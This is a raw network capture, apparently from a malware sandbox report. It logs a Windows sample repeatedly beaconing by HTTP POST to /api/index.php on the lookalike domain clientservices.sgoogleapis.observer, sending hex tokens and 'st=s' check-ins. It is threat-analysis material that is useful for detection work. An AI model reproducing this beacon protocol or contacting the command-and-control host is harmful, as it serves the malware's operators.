Jan 8, 2025 08:45:23.078464985 CET	326	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Jan 8, 2025 08:45:23.716007948 CET	821	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:45:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GcgJBCu2DWHo2nJJsGhynk5SvN2XbzlvoYFED1M05L1jQOV%2B877Sk0s2mb%2FINt93lV3ZcL2TwDlyAIpbXjXf71B5baK5PsTpdcPdkMk4TujSHSmYDonxv7BkTjTLRVz1Vz7VmJKKL7NMmR1U%2BivHMv15m1tItg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea9159be160f36-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1460&min_rtt=1460&rtt_var=730&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.5	50015	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:45:25.796592951 CET	172	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jan 8, 2025 08:45:26.355808020 CET	815	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:45:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dHpZADUAmC6JtQFCDuUKOD%2BbRbi8%2FaUrICTtYQrz9MJE9jGt4SGEHKRsbmOCVgNUXCF8991sMuN6WzBm2pozmcjPtKVgbYLEt6bUtFdy8ttLByhiLhuxopwhRMnwYuS7M9pTVQ3xLlkp2wYwa4mQL%2FkM9gkPiA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea916adfe942d2-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1570&min_rtt=1570&rtt_var=785&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.5	50016	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:45:27.873799086 CET	326	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Jan 8, 2025 08:45:28.528362989 CET	831	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:45:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N%2Bpl6WE9mlRO3KiYFCA7YIfAMOdvwaNl25KnNNtyYMEYKYre3urI%2BZruQ%2BxJsmhoy3gz4oZ36jbcfe%2Bak2P6ZbqfNbMXWgfizZn7tE3m5s2na3qg3G5pBX%2BXOcGqP6rZ%2FoDtfP0ZL2TAU01o%2BHND5p8V%2BwUKaA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea9177cadf43ee-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1688&min_rtt=1688&rtt_var=844&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.5	50017	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:45:30.155406952 CET	172	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jan 8, 2025 08:45:30.788145065 CET	821	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:45:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sVxOlzQ2glaWfHqwjpZl5U7QSV2rKtzw9Jl4T%2FkIHXfDUf66vtbVjP%2FUKzVxTN2rCGzGBRunThBjG9uZHnR3qbuw%2BY6pvg2i0i%2BFfXsQWmcJq0aHP3VW5ASuglvhMq3RM97bPD3n7OmtNiQTJSL%2FSBxtFMr%2FTA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea91860a9d42d2-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1569&min_rtt=1569&rtt_var=784&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.5	50018	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:45:32.409204006 CET	326	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Jan 8, 2025 08:45:33.060673952 CET	821	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:45:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D%2FkNYbqHhiTRPuYLLwnbknER85kVI3jw6IohLF6CLMEGKi4R9LWD6NaTyI472J%2B1JVDYS8U1PUP4sy9ntgEz3dBXbp3x4nmRrEPTu3AOMbL0MAeHMclO4jPOY0JmOo4zbcz%2FOu2bXp75cEIJhYUSZFEazelwaA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea91942d6d7d0e-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1916&min_rtt=1916&rtt_var=958&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.5	50019	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:45:34.686187029 CET	172	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jan 8, 2025 08:45:35.310575962 CET	815	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:45:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Dmlf8FCPM%2BD57Y6bYhVsUAL6oZEQRxJ4ICPu2%2BaEcdLhNyOKlGlBN26aGP4afRrda30esuuo7MYSYNY7NA0EXz6oHrVazglA8nFUrylpvZoTdY5oK8nil3QJKMQige8EJYF4XCggMvFIdRQfdw7uxexIFnx%2FNg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea91a24a1b42d2-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1618&min_rtt=1618&rtt_var=809&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.5	50020	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:45:36.827311039 CET	326	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Jan 8, 2025 08:45:37.467489004 CET	831	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:45:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lkATLPUL7SX5N2KI2Mnf6YceKVkzH7UOCfaxZxm0wHx9vG0kzZJp%2F9XeF3Afe0xx%2F3MzYvJzeEr0F4L5HyYjxQC%2B2X%2BWj4Qzpg7DpSEoMdguQ6mN0LcL2VhSo%2Ff5Rz%2BJZGNZ1bGUXpMyJZv9mDJ9Z5cysa%2B%2F9g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea91afbd1b0f36-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1440&min_rtt=1440&rtt_var=720&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.5	50021	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:45:39.191734076 CET	172	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jan 8, 2025 08:45:39.845268011 CET	821	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:45:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t143zRmyZlM0plOv6JfnsTR%2B%2BzOnQyPJYxDixWRpC1vnzEgrBOSzGnxwiJucYDV6tGJP2C1Iv441vSiDgB38hDfQQ%2BZUhEePBp55NZYzT2j5B2qhsAa%2Fsts%2F9Yiqg1vWM8gUz3jWp%2FPprXv87K53pQIQMmXEvA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea91be9b5f0f36-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1448&min_rtt=1448&rtt_var=724&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.5	50022	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:45:41.364422083 CET	326	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Jan 8, 2025 08:45:42.000072002 CET	823	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:45:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r9Fb3fB%2BmPWsZzSELWH9ZIqj22hgf0elIG6hW96tGmmmUCy%2FVXakbOVshAvNix7eVRereGf4HdfajBIq4rGo6N2XToTuURB16AlWxUoqXNZic2aIXomhZznpVSkEURF1cUM3pKYkksGQTePR7Ur%2Bpqa1nE%2FX2A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea91cc093f42d2-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1563&min_rtt=1563&rtt_var=781&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.5	50023	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:45:43.744420052 CET	172	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jan 8, 2025 08:45:44.373550892 CET	813	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:45:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tr21aJtxYr56ksQdk0lvXjjB4FgpIeqV3mANv0MIHHUN8i%2FEN9eFttR3w6BzVw1s7Y01uRqXAPcEhL7jvSsx01DzHs4pOVWdKLRdJc96qYy%2BjmuhtYnIGKPjVKiOVWi3aKsl6TCOZS1wCPKvnW91PJNk9c51Ww%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea91daebae8c0f-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1981&min_rtt=1981&rtt_var=990&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.5	50024	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:45:45.888672113 CET	326	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Jan 8, 2025 08:45:46.523636103 CET	829	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:45:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W359lkpTQDPiM5UCNW9c3t2ezkaaZLMyD3SHHt757us2QqpAlRgzXmZ89Cu38V878fFnm8PK0AQIQQBhv1Yy2YiWJg%2FMxkp6DC%2FuEKhHHx%2F3%2BLJZ0KT9GdyZG6tyC9UBIYqlcKo33rbzmySgo2c%2FgfMW%2FF%2BAvg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea91e849a643ee-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1677&min_rtt=1677&rtt_var=838&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.5	50025	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:45:48.159876108 CET	172	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jan 8, 2025 08:45:48.783965111 CET	821	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:45:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6QUNnaDTcfVqvZJnzi1bmsHxLRjHpfLldOPbKa92KN0as1O4INXAkAcV%2BqamofFvhR6QbQvZPPYUr%2Bne8GCUNyt1k7xHlVC0wK8%2B7OPWsWz7pLnT2%2FxsiczMC4m63wBLVuJyK%2FC%2BhAgadXXuFgnU638U81gVNw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea91f6792642d2-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1560&min_rtt=1560&rtt_var=780&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.5	50026	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:45:50.301374912 CET	326	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Jan 8, 2025 08:45:50.845326900 CET	834	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:45:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eGZrOk3LZ3Ul7AD4CkMyFkgQTjoFVr4Ns%2B6%2FIzWFZGlJQzVmqGEEAweCGJ%2BLEiqgZS3k8%2FmNMHQqfPKtxBvxVesQ2zuchIgewRWI6JKJZCrHdCxk7TePu9s%2FiE7%2BxC5wivTIOx%2BzjHoso%2BP%2BCDfQl0BWIm1Lqw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea9203db6f8c0f-EWR server-timing: cfL4;desc="?proto=TCP&rtt=2023&min_rtt=2023&rtt_var=1011&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.5	50027	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:45:52.577013016 CET	172	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jan 8, 2025 08:45:53.222126007 CET	813	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:45:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=glnr9%2FzVxIkRwOVjxCcRzfd8BDSdWCfhS3iLNWuG%2BO40nFMyVewhl8VCGpARjFqn1ddLmaIezYBDUuEhiVU68glgyPsQt94EwYrSW3yLIwiMWjMJ9YEZdHuExjnl7v52ypaqK0GoMPrqap49wbfczvrHDqYOXA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea92123be743ee-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1699&min_rtt=1699&rtt_var=849&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.5	50028	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
